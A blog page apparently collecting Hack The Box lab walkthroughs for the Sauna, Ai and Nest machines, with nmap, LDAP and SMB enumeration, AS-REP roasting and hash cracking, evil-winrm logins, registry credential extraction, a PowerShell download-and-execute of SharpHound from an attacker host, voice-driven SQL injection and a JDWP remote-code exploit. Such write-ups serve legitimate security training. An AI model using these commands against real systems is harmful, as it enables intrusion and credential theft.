Month: February 2020
Protected: htb-misc-challenges
htb-sauna-nl
As always we start with an nmap scan
# Nmap 7.80 scan initiated Tue Feb 18 03:17:50 2020 as: nmap -A -oN allports 10.10.10.175 Nmap scan report for 10.10.10.175 Host is up (0.076s latency). Not shown: 988 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Egotistical Bank :: Home 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-18 16:19:56Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=2/18%Time=5E4B9DC1%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port OS fingerprint not ideal because: Missing a closed TCP port so results incomplete No OS matches for host Network Distance: 2 hops Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 8h01m51s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-02-18T16:22:19 |_ start_date: N/A TRACEROUTE (using port 445/tcp) HOP RTT ADDRESS 1 100.30 ms 10.10.16.1 2 100.29 ms 10.10.10.175 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Feb 18 03:23:06 2020 -- 1 IP address (1 host up) scanned in 317.70 seconds
The most interesting ports open were: HTTP(80), Kerberos(88) and Win-RM (5985) .
User
I enumerated the Ldap port:
┌─[puck@parrot-lt]─[~/htb/sauna]
└──╼ $ldapsearch -x -H 10.10.10.175 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
┌─[puck@parrot-lt]─[~/htb/sauna]
└──╼ $
Next the most interesting part was:
root@kali:~/htb/sauna# ldapsearch -h 10.10.10.175 -p 389 -x -b "dc=EGOTISTICAL-BANK,dc=LOCAL" > ldaplogall.txt root@kali:~/htb/sauna# ls allports ldaplogall.txt # Hugo Smith, EGOTISTICAL-BANK.LOCAL dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL root@kali:~/htb/sauna# ldapsearch -x -H ldap://10.10.10.175 -D 'EGOISTICAL-BANK\hsmith' -w 'Thestrokes23' -b "dc=EGOTISTICAL-BANK,dc=LOCAL" > ldaplogall.txt
Now we have a possible username: “ Hugo Smith ”.
If you try to ASREPRoast that user you will find that it doesn’t exist. So I tried variations of the name and found one that was indeed a valid user: hsmith .
Variations I tried:
Hugo Smith HugoSmith hugo.smith h.smith hsmith smithh smith.h smith.hugo smithhugo smith hugo
Found user:
root@kali:~/htb/sauna# GetNPUsers.py -dc-ip 10.10.10.175 EGOTISTICAL-BANK.LOCAL/ -usersfile hugosmith.txt
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] invalid principal syntax
So, now we have a valid user “ hsmith ” but no password…
It’s time to take a look to the web server. In there you will only find a few html pages, some
of them contains interesting names:
So, that we know the format that is being used to create the usernames, let’s check this usernames:
fsmith scoins sdriver btaylor hbear
We found that the user “ fsmith ” is vulnerable to ASREProast and we have obtained the crackable “hash”.
root@kali:~/htb/sauna# GetNPUsers.py -dc-ip 10.10.10.175 -no-pass EGOTISTICAL-BANK.LOCAL/FSmith
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for FSmith
$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:cb52c62c6143cf4cc4c71dccf64756f5$d216f5b0ae6326c1a3027dd19f3976e5a8259a5a1c4118f7f61da536f069ac63b15d65498c22399ff1d985819c280dbda2b88236429eaf03d4b1e25b7ba49323a378e4854c3e0b26b6ec7bb4c5245651e32ffb84025e34d9b05db659e80f2b510ccfcb3e0274b13fff13b6e650a987cb2d73f8288239ca15f7aa19e0914f48e5ccfe49af81e1aaf2f3864ed48ebe21e8f32258eeedcf7924022213178f4175dafd77b97dae029dbf57648cafd31769624759538c9f56a92cbf3bb52af1c19488fc633abedb85df88b6297cd921006a2e0706f20ae5a05d5091feeee6870ff014496e38ba7b397d90e4a42bb46940b2cecda70ac4de67dd1ed817028f37cbe46b
So, let’s crack it with john /hashcat and rockyou:
┌─[puck@parrot-lt]─[~/htb/sauna] └──╼ $hashcat -m 18200 ego.hash /usr/share/wordlists/rockyou.txt --force hashcat (v6.1.1) starting... You have enabled --force to bypass dangerous warnings and errors! This can hide serious problems and should only be done when debugging. Do not report hashcat issues encountered when using --force. OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] ============================================================================================================================= * Device #1: pthread-Intel(R) Core(TM) i5-10210U CPU @ 1.60GHz, 5690/5754 MB (2048 MB allocatable), 8MCU Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Applicable optimizers applied: * Zero-Byte * Not-Iterated * Single-Hash * Single-Salt ATTENTION! Pure (unoptimized) backend kernels selected. Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance. If you want to switch to optimized backend kernels, append -O to your commandline. See the above message to find out about the exact limits. Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled. Host memory required for this attack: 204 MB Dictionary cache built: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344392 * Bytes.....: 139921507 * Keyspace..: 14344385 * Runtime...: 1 sec $krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:bee59333cd5943cd85e7e49722df567e$262e47ce9223b4a47acdbcb6b5eb5830c09ee84ab07c42b17553ff201c3a5cd8f7d4ef8cdd3017fdb161779c90e486aef38d9afa2ca642ccbd76e70cb7934b2970fd0741bbfffb10c5801e3c05026e535419946c73270917a1405ab01ade94347964967ab62086c4222cece0363269b507692736f893892cf4afd05a60625cc2c3b32211f93425113af6bb8961e0fd46d88a2696cb10b18f7147117d2ac6bf22337cbab822c0f39b9dbc8f8ba78adc9f089b8677258db7b9a066dfb3d20f66be1bf390fa25bee98abb9dcf056c3417adf165f9382e89da61da7c53c708303db61db36bd273ed8f3aba394b1e0f89ad38b0d291502bb494cd589f34f1790e3e14:Thestrokes23 Session..........: hashcat Status...........: Cracked Hash.Name........: Kerberos 5, etype 23, AS-REP Hash.Target......: $krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:bee5933...0e3e14 Time.Started.....: Sat Sep 24 20:49:12 2022, (12 secs) Time.Estimated...: Sat Sep 24 20:49:24 2022, (0 secs) Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 881.0 kH/s (7.26ms) @ Accel:32 Loops:1 Thr:64 Vec:8 Recovered........: 1/1 (100.00%) Digests Progress.........: 10551296/14344385 (73.56%) Rejected.........: 0/10551296 (0.00%) Restore.Point....: 10534912/14344385 (73.44%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: Tioncurtis23 -> TUGGIE Started: Sat Sep 24 20:48:53 2022 Stopped: Sat Sep 24 20:49:25 2022 ┌─[puck@parrot-lt]─[~/htb/sauna]
root@kali:~/htb/sauna# john ego.hash -wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23 ($krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL)
1g 0:00:00:33 DONE (2020-02-18 04:48) 0.02995g/s 315720p/s 315720c/s 315720C/s Thines..Theredwolf_120691
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Credentials found: fsmith:Thestrokes23
Now, just connect via Win-RM and grab the user flag:
root@kali/opt/evil-winrm# ruby evil-winrm.rb -u fsmith -p "Thestrokes23" -i EGOTISTICAL-BANK.LOCAL *Evil-WinRM* PS C:\Users\FSmith\desktop> type user.txt 1b5520b98d97cf17f24122a55baf70cf *Evil-WinRM* PS C:\Users\FSmith\desktop> certutil -urlcache -split -f http://10.10.14.10/WINPEAS.exe C:\Users\FSmith\Documents\WINPEAS.exe
Root
I started enumerating the box using winPEAS
*Evil-WinRM* PS C:\Users\FSmith\Documents> ./winpeas.exe systeminfo userinfo ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD Creating Dynamic lists, this could take a while, please wait... - Checking if domain... - Getting Win32_UserAccount info... --snip-- [+] RDP Sessions(T1087&T1033) Not Found [+] Ever logged users(T1087&T1033) [X] Exception: System.Management.ManagementException: Access denied at System.Management.ThreadDispatch.Start() at System.Management.ManagementScope.Initialize() at System.Management.ManagementObjectSearcher.Initialize() at System.Management.ManagementObjectSearcher.Get() at winPEAS.UserInfo.GetEverLoggedUsers() Not Found [+] Looking for AutoLogon credentials(T1012) Some AutoLogon credentials were found!! DefaultDomainName : EGOTISTICALBANK DefaultUserName : EGOTISTICALBANK\svc_loanmanager DefaultPassword : Moneymakestheworldgoround!
or it can be done manually
*Evil-WinRM* PS C:\Users\FSmith\Documents> REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon AutoRestartShell REG_DWORD 0x1 Background REG_SZ 0 0 0 CachedLogonsCount REG_SZ 10 DebugServerCommand REG_SZ no DefaultDomainName REG_SZ EGOTISTICALBANK DefaultUserName REG_SZ EGOTISTICALBANK\svc_loanmanager DisableBackButton REG_DWORD 0x1 EnableSIHostIntegration REG_DWORD 0x1 ForceUnlockLogon REG_DWORD 0x0 LegalNoticeCaption REG_SZ LegalNoticeText REG_SZ PasswordExpiryWarning REG_DWORD 0x5 PowerdownAfterShutdown REG_SZ 0 PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16} ReportBootOk REG_SZ 1 Shell REG_SZ explorer.exe ShellCritical REG_DWORD 0x0 ShellInfrastructure REG_SZ sihost.exe SiHostCritical REG_DWORD 0x0 SiHostReadyTimeOut REG_DWORD 0x0 SiHostRestartCountLimit REG_DWORD 0x0 SiHostRestartTimeGap REG_DWORD 0x0 Userinit REG_SZ C:\Windows\system32\userinit.exe, VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile WinStationsDisabled REG_SZ 0 scremoveoption REG_SZ 0 DisableCAD REG_DWORD 0x1 LastLogOffEndTimePerfCounter REG_QWORD 0x8e3982368 ShutdownFlags REG_DWORD 0x80000027 DisableLockWorkstation REG_DWORD 0x0 DefaultPassword REG_SZ Moneymakestheworldgoround! HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserDefaults HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey *Evil-WinRM* PS C:\Users\FSmith\Documents>
It found some interesting credentials inside the Winlogon registry:
There isn’t any user called “ svc_loanmanager ” but there is one called “ svc_loanmgr ” svc_loanmgr : Moneymakestheworldgoround!
And you can connect to it with the password extracted from the registry:
You can also use Sharphound to enumerate the Domain and you will find that the user svc_loanmgr has permissions to execute DCSync against the DC:
Bloodhound
We can use Bloodhound to enumerate and visualise the Active Directory domain, and identify possible attack chains that will allow us to elevate our domain privileges. The bloodhound–python ingestor can be used to remotely collect data from the Active Directory. Then, we can run
bloodhound to visualise any available attack paths.
sudo apt install bloodhound
sudo pip install bloodhound-python
bloodhound-python -u svc_loanmgr -p Moneymakestheworldgoround! -d EGOTISTICAL-BANK.LOCAL -ns 10.10.10.175 -c All
Start neo4j server.
neo4j console
Then type bloodhound to access the BloodHound UI. When bloodhound–python is finished,
compress the files into a zip and upload it
root@kali:/opt/evil-winrm# ruby evil-winrm.rb -u svc_loanmgr -p "Moneymakestheworldgoround!" -i EGOTISTICAL-BANK.LOCAL Info: Starting Evil-WinRM shell v1.6 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> powershell -command "IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.70/SharpHound.ps1'); Invoke-BloodHound -CollectionMethod All -Verbose -LdapUSer 'svc_loanmgr' -LdapPass 'Moneymakestheworldgoround!'" Initializing BloodHound at 5:42 PM on 2/18/2020 Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL Adding Network Credential to connection Resolved Collection Methods to Group, LocalAdmin, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets Building GUID Cache Starting Enumeration for EGOTISTICAL-BANK.LOCAL Adding Network Credential to connection Waiting for enumeration threads to finish Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL Status: 60 objects enumerated (+60 ì/s --- Using 83 MB RAM ) Finished enumeration for EGOTISTICAL-BANK.LOCAL in 00:00:00.4511238 0 hosts failed ping. 0 hosts timedout. Waiting for writer thread to finish Compressing data to C:\Users\svc_loanmgr\Documents\20200218174244_BloodHound.zip. You can upload this file directly to the UI. Finished compressing files!
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> download 20200218174244_BloodHound.zip Info: Downloading 20200218174244_BloodHound.zip to 20200218174244_BloodHound.zip Info: Download successful! *Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> exit Info: Exiting with code 0 root@kali:/opt/evil-winrm#
*Evil-WinRM* PS C:\programdata> .\Sharphound.exe -c all 2022-09-24T18:56:56.9785964-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound 2022-09-24T18:56:57.1192436-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote 2022-09-24T18:56:57.1506456-07:00|INFORMATION|Initializing SharpHound at 6:56 PM on 9/24/2022 2022-09-24T18:57:09.3379487-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote 2022-09-24T18:57:09.4786146-07:00|INFORMATION|Beginning LDAP search for EGOTISTICAL-BANK.LOCAL 2022-09-24T18:57:09.5098741-07:00|INFORMATION|Producer has finished, closing LDAP channel 2022-09-24T18:57:09.5098741-07:00|INFORMATION|LDAP channel closed, waiting for consumers 2022-09-24T18:57:39.9005021-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM 2022-09-24T18:58:07.2442001-07:00|INFORMATION|Consumers finished, closing output channel 2022-09-24T18:58:07.2754507-07:00|INFORMATION|Output channel closed, waiting for output task to complete Closing writers 2022-09-24T18:58:07.3691997-07:00|INFORMATION|Status: 94 objects finished (+94 1.649123)/s -- Using 42 MB RAM 2022-09-24T18:58:07.3691997-07:00|INFORMATION|Enumeration finished in 00:00:57.9016252 2022-09-24T18:58:07.4473475-07:00|INFORMATION|Saving cache with stats: 53 ID to type mappings. 53 name to SID mappings. 0 machine sid mappings. 2 sid to domain mappings. 0 global catalog mappings. 2022-09-24T18:58:07.4473475-07:00|INFORMATION|SharpHound Enumeration Completed at 6:58 PM on 9/24/2022! Happy Graphing! *Evil-WinRM* PS C:\programdata> dir *.zip Directory: C:\programdata Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 9/24/2022 6:58 PM 11485 20220924185806_BloodHound.zip *Evil-WinRM* PS C:\programdata> upload 20220924185806_BloodHound.zip
.
*Evil-WinRM* PS C:\temp> net use \\10.10.14.10\share /u:puck puck The command completed successfully. *Evil-WinRM* PS C:\temp> cp 20220924185806_BloodHound.zip \\10.10.14.10\share\ *Evil-WinRM* PS C:\temp>
┌─[✗]─[puck@parrot-lt]─[~/htb/sauna]
└──╼ $sudo impacket-smbserver -username puck -password puck share . -smb2support
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.175,49819)
[*] AUTHENTICATE_MESSAGE (\df,SAUNA)
[*] User SAUNA\df authenticated successfully
[*] df:::aaaaaaaaaaaaaaaa:cc698eaf23e930262c688bcc686fffb5:010100000000000000a9108a48d0d801946617735218756000000000010010004d004700790044004d0048006d004800030010004d004700790044004d0048006d0048000200100076005a0052004a0064007a00670058000400100076005a0052004a0064007a00670058000700080000a9108a48d0d80106000400020000000800300030000000000000000000000000210000fcffb479cf1627839a9882b2cc0e3163d00d1e286c75c538f3ed06b8e7187bd80a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310030000000000000000000
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:share)
[*] Disconnecting Share(1:IPC$)
[*] Connecting Share(3:IPC$)
[*] Disconnecting Share(3:IPC$)
.
htb-ai-nl
Welcome back! Today we are doing the Hack the Box machine – Ai. This is a Linux box with a medium difficulty. Let’s see what’s in store!
As always we kick it off with our nmap
scan: nmap -sC -sV -T4 -p- -oA all_ports 10.10.10.163
Here are our results:
Host is up (0.060s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6d:16:f4:32:eb:46:ca:37:04:d2:a5:aa:74:ed:ab:fc (RSA)
| 256 78:29:78:d9:f5:43:d1:cf:a0:03:55:b1:da:9e:51:b6 (ECDSA)
|_ 256 85:2e:7d:66:30:a6:6e:30:04:82:c1:ae:ba:a4:99:bd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Hello AI!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.04 seconds
Well, it looks like web services are the way in. Let’s see whats being hosted on port 80.
We have a Artificial Intelligence site. The links lead to php
files. We’ll start our enumeration with gobuster
.
Command:
gobuster dir -u ai.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 75 -x php
Here are our results:
/uploads (Status: 301)
/images (Status: 301)
/index.php (Status: 200)
/db.php (Status: 200)
/contact.php (Status: 200)
/about.php (Status: 200)
/intelligence.php (Status: 200)
/ai.php (Status: 200)
/server-status (Status: 403)
Now we’ll start visiting these pages to see if there are any paths forward. We see that the premise of the site is using voice recognition from audio files as a search engine. On the ai.php
page we see there is an upload form requesting a .wav
file. So we’ll upload a sample file and see what happens. We get a response:
Good to know info, we’ll move onto the next page which was intelligence.php
. Here is a list of supported API calls. So my logic here is to create a .wav
with some type of text to speach engine using the provided api to craft my payload.
A quick google search for ‘text to speech download’ lead me to a few sites. We need the ability to download our crafted payload as well, simply saying it back isn’t quite good enough.
Now let’s craft an SQL injection
using our documentation. It’s noted at the bottom of the page that they mostly follow Microsoft’s approach. So we dig up a list of recognized commands, here. Now we can seemingly using things like ‘open parenthesis’ and ‘close parenthesis’ to craft our statement.
Crafted database command:
won open single quote union select database open parenthesis close parenthesis
comment database
Is the same as saying:
1'union select database()-- -
So now that we’ve input this text-to-speech in, we save the file. Next we need to convert the file to a .wav
. There are plenty of ways to do this. Two that can be done nativly in Kali are:
ffmpeg -i input.mp3 output.wav
or mpg123 -w output.wav input.mp3
.
Now that we have the payload compiled so to speak, let’s upload it.
Look’s like it worked! We have a database name of alexa
. We will continue to craft payloads until we get what we need. It should be noted that sometimes the playback speed at certain parts of the payload needed to be slowed down. In the case of finding the table:
won open single quote union select table underscore schema comma table underscore name comma won from information underscore schema dot tables
This needed to be modified a bit more heavily, speed, emphisis and voice.
After much trial and error, we finally get the user password:
Great, now we have a username and password. Maybe it’ll work for SSH
.
root@kali:~/htb/ai# ssh alexa@10.10.10.163 alexa@10.10.10.163's password: H,Sq9t6}a<)?q93_ Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 5.3.7-050307-generic x86_64) alexa@AI:~$ cat user.txt c43b62c682a8c0992eb6d4a2cda55e4b
We are in. We snag our user.txt
flag and start enumerating for root. We sping up a SimpleHTTPServer
and download Linpeas.sh
onto the box. We see that there are few more open ports available to us:
We also see Tomcat
running a cron job:
As well as Java
task running that references Tomcat
running on port 8000:
After doing some research it looks like this is Java Debug Wire Protocol. THe give away was the jdwp in the process running: jdwp=transport
. The first google seach for this came back with quite a few RCE on the protocol. This one does a great job of breaking it down. It also has a proof of concept, here.
We copy the file to the server and run it.
It seems to execute but we never catch a shell via netcat
. Let’s craft a payload with msfpc
or msfvenom
. We issue msfpc elf tun0
to generate a Linux payload. We can then copy this payload to the server under /tmp
. Then we will launch our MSF listener and retry our payload. Still doesn’t work. After some furthre digging it was suggested to try a different Java method to hook from. We’ll use a pretty basic one of java.lang.String.indexOf
. This time we run it and get a shell!
root.txt
is right as we land in. Box complete! This was quite a unique box for sure, I did NOT like the privesc part (didn’t work for me )
all credits go to https://rootflag.io/hack-the-box-ai/
Protected: htb-forensic-challenges
Protected: htb-registry-nl
htb-nest-nl
Hack the box Nest (IP: 10.10.10.178) is a recently released Windows machine. The unintentional way to own the box using Metasploit no longer works, because the HTB men have patched the machine.
RECONNAISSANCE
I recently got introduced to a tool called AutoRecon. https://github.com/Tib3rius/AutoRecon . This actually gives a nice report in a text format with correctly categorized results in the different folders.
Before I left AutoRecon to the task, used nmap to start the scan. The scan result shows two open ports (SMB 2: 445 and port 4386).
root @ kali: ~ / htb / nest # nmap -sS -sV -sC -oN nmap.txt -Pn 10.10.10.178 Starting Nmap 7.80 (https://nmap.org) at 2020-02-04 03:44 EST Nmap scan report for nest.htb (10.10.10.178) Host is up (0.086s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 445 / tcp open microsoft ds? Host script results: | _clock-skew: 1m45s | smb2-security-mode: | 2.02: | _ Message signing enabled but not required | smb2-time: | date: 2020-02-04T08: 47: 09 | _ start_date: 2020-02-04T05: 55: 06 Service detection performed. Please report any incorrect results at https://nmap.org/submit/. Nmap done: 1 IP address (1 host up) scanned in 65.37 seconds
root @ kali: /opt/AutoRecon/results/10.10.10.178/scans# cat smbmap-share-permissions.txt [+] Finding open SMB ports .... [+] User SMB session establishd on 10.10.10.178 ... [+] IP: 10.10.10.178:445 Name: nest.htb Disk Permissions ---- ----------- [!] Access Denied [+] Finding open SMB ports .... [+] Guest SMB session established on 10.10.10.178 ... [+] IP: 10.10.10.178:445 Name: nest.htb Disk Permissions ---- ----------- ADMIN $ NO ACCESS C $ NO ACCESS Data READ ONLY IPC $ NO ACCESS Secure $ NO ACCESS Users READ ONLY
root @ kali: /opt/AutoRecon/results/10.10.10.178/scans# cat smbmap-list-contents.txt [+] Finding open SMB ports .... [+] User SMB session establishd on 10.10.10.178 ... [+] IP: 10.10.10.178:445 Name: nest.htb Disk Permissions ---- ----------- [!] Access Denied [+] Finding open SMB ports .... [+] Guest SMB session established on 10.10.10.178 ... [+] IP: 10.10.10.178:445 Name: nest.htb Disk Permissions ---- ----------- ADMIN $ NO ACCESS C $ NO ACCESS Data READ ONLY . \ dr - r - r-- 0 Wed Aug 7 18:53:46 2019. dr - r - r-- 0 Wed Aug 7 18:53:46 2019 .. dr - r - r-- 0 Wed Aug 7 18:58:07 2019 IT dr - r - r-- 0 Mon Aug 5 17:53:41 2019 Production dr - r - r-- 0 Mon Aug 5 17:53:50 2019 Reports dr - r - r-- 0 Wed Aug 7 15:07:51 2019 Shared . \\ Shared \ dr - r - r-- 0 Wed Aug 7 15:07:51 2019. dr - r - r-- 0 Wed Aug 7 15:07:51 2019 .. dr - r - r-- 0 Wed Aug 7 15:07:33 2019 Maintenance dr - r - r-- 0 Wed Aug 7 15:08:07 2019 Templates . \\ Shared \ Maintenance \ dr - r - r-- 0 Wed Aug 7 15:07:33 2019. dr - r - r-- 0 Wed Aug 7 15:07:33 2019 .. -r - r - r-- 48 Wed Aug 7 15:07:32 2019 Maintenance Alerts.txt . \\ Shared \ Templates \ dr - r - r-- 0 Wed Aug 7 15:08:07 2019. dr - r - r-- 0 Wed Aug 7 15:08:07 2019 .. dr - r - r-- 0 Wed Aug 7 15:08:10 2019 HR dr - r - r-- 0 Wed Aug 7 15:08:07 2019 Marketing . \\ Shared \ Templates \ HR \ dr - r - r-- 0 Wed Aug 7 15:08:10 2019. dr - r - r-- 0 Wed Aug 7 15:08:10 2019 .. -r - r - r-- 425 Wed Aug 7 18:55:36 2019 Welcome Email.txt IPC $ NO ACCESS Secure $ NO ACCESS Users READ ONLY . \ dr - r - r-- 0 Sat Jan 25 18:04:21 2020. dr - r - r-- 0 Sat Jan 25 18:04:21 2020 .. dr - r - r-- 0 Fri Aug 9 11:08:23 2019 Administrator dr - r - r-- 0 Sun Jan 26 02:21:44 2020 C. Smith dr - r - r-- 0 Thu Aug 8 13:03:29 2019 L.Frost dr - r - r-- 0 Thu Aug 8 13:02:56 2019 R. Thompson dr - r - r-- 0 Wed Aug 7 18:56:02 2019 TempUser
I found many SMB shares, in one of the shares there is a Welcome Email.txt file which looked like an email template that HR used to send to the newly joined employees. The template has a default username and password, tempuser: welcome2019
Since I have the login credentials of a standard user, I started exploring the box and found an interesting XML configuration file in \ IT \ Configs \ RU Scanner \. The file actually had credentials from a user C. Smith in an encrypted format.
c.smith: fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE =
1
2
3
4
|
smb: \IT\Configs\RU Scanner\> get RU_config.xml
getting file \IT\Configs\RU Scanner\RU_config.xml of size 270 as RU_config.xml (0.4 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \IT\Configs\RU Scanner\>
|
I spent a few minutes decrypting the password using online tools, but nothing helped me so I decided to spend time on the machine instead. I spent some time on the machine as I was suggested to find useful files in the data / IT / Carl / VB Projects folder so I did.
The NotepadPlusPlus folder contains two XML files. One is config.xml which has a code snippet at the end of the file that displays the user’s file access history. The list shows that the TempUser opened a file called “Temp.txt” from another user’s shared folder “Carl”. When I tried to list the folders in the IT folder, I was not given permission, but I was able to list Carl’s content directly.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
|
# root@kali ~/htb/nest [13:15:53]
$ smbclient //10.10.10.178/Secure$ -U TempUser
